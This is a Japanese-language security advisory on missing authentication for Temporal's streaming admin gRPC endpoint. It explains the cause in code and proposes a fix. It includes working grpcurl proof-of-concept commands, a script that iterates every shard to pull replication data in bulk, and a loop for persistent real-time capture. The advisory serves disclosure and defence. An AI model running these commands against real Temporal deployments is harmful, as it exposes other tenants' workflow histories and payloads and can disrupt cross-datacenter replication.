Temporal フロントエンドサービスは、ストリーミング gRPC RPC に対して認証を強制していません。ストリーミングインターセプターチェーンには認可インターセプターが含まれておらず、認証されていない呼び出し元が、全名前空間にわたってワークフロー複製データをストリーミングする特権的な管理者専用エンドポイントである AdminService/StreamWorkflowReplicationMessages にアクセスできるようになっています。
service/frontend/fx.go のフロントエンド gRPC サーバーは、2 つのインターセプターチェーンを構成しています。ストリーミングチェーンには、メトリクス用の telemetryInterceptor.StreamIntercept のみが含まれ、認証は含まれていません:
authorization.Interceptor 型は、単項インターセプターメソッド (Intercept) のみを実装しています。ストリーミング相当のものは存在しません。フロントエンドの唯一のストリーミング RPC は AdminService/StreamWorkflowReplicationMessages であり、https://github.com/temporalio/temporal/blob/c9a39e6914c0b3a114ddfe42e991334ed911a4cf/common/api/metadata.go#L214-L215 によれば {Scope: ScopeCluster, Access: AccessAdmin} を要求するはずです。ストリーミング呼び出しは、認証なしで admin_handler.go:1904 のハンドラーに到達し、そこで内部ヒストリーサービスの複製エンドポイントに直接プロキシされます。
フロントエンド gRPC API を公開している Temporal デプロイメントを用意します。
資格情報なしでストリーミング AdminService RPC を呼び出します:
grpcurl -max-time 15 \
-H "temporal-client-cluster-id: 1" \
-H "temporal-client-shard-id: 1" \
-H "temporal-server-cluster-id: 1" \
-H "temporal-server-shard-id: 1" \
-d '{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}' \
temporal-frontend.example.com:443 \
temporal.server.api.adminservice.v1.AdminService/StreamWorkflowReplicationMessages
# ストリームが接続されます。サーバーはシャードごとの
# exclusiveHighWatermark を含む複製状態で応答します。アクティブな複製中は、
# 応答にシリアル化されたワークフローヒストリーイベントが含まれます:
# {
# "messages": {
# "replicationTasks": [{
# "namespaceId": "...",
# "workflowId": "...",
# "runId": "...",
# "taskType": "REPLICATION_TASK_TYPE_HISTORY_V2_TASK",
# ...
# }],
# "exclusiveHighWatermark": "148293"
# }
# }
すべてのシャードを反復処理して大規模にデータを抽出するには:
#!/usr/bin/env bash
set -euo pipefail
TARGET="${1:-temporal-frontend.example.com:443}"
NUM_SHARDS="${2:-1024}"
CLUSTER_ID="${3:-1}" # initialFailoverVersion: 1=アクティブ, 2=フェイルオーバー
ADMIN_SVC="temporal.server.api.adminservice.v1.AdminService"
for SHARD in $(seq 1 "${NUM_SHARDS}"); do
grpcurl -max-time 10 \
-H "temporal-client-cluster-id: ${CLUSTER_ID}" \
-H "temporal-client-shard-id: ${SHARD}" \
-H "temporal-server-cluster-id: ${CLUSTER_ID}" \
-H "temporal-server-shard-id: ${SHARD}" \
-d '{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}' \
"${TARGET}" "${ADMIN_SVC}/StreamWorkflowReplicationMessages" 2>&1 || true
done
ストリームを永続的に開いたままにして、複製イベントをリアルタイムでキャプチャするには:
(
while true; do
echo '{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}'
sleep 5
done
) | grpcurl -d @ \
-H "temporal-client-cluster-id: 1" \
-H "temporal-client-shard-id: 1" \
-H "temporal-server-cluster-id: 1" \
-H "temporal-server-shard-id: 1" \
temporal-frontend.example.com:443 \
temporal.server.api.adminservice.v1.AdminService/StreamWorkflowReplicationMessages
フロントエンドにアクセスできる攻撃者は、資格情報なしで全名前空間およびテナントにわたるワークフロー複製データ — ワークフロー ID、ラン ID、ヒストリーイベント、アクティビティペイロード — を読み取ることができます。攻撃者は SyncReplicationState メッセージを送信することでクロスデータセンター複製に干渉することもでき、通常は外部に公開されることのない内部ヒストリーサービスへのブリッジも獲得します。
authorization.Interceptor に StreamServerInterceptor を実装し、service/frontend/fx.go:292-296 のストリーミングチェーンに追加します:
streamInterceptor := []grpc.StreamServerInterceptor{
telemetryInterceptor.StreamIntercept,
authInterceptor.StreamIntercept, // ストリーミング RPC で認証を強制
}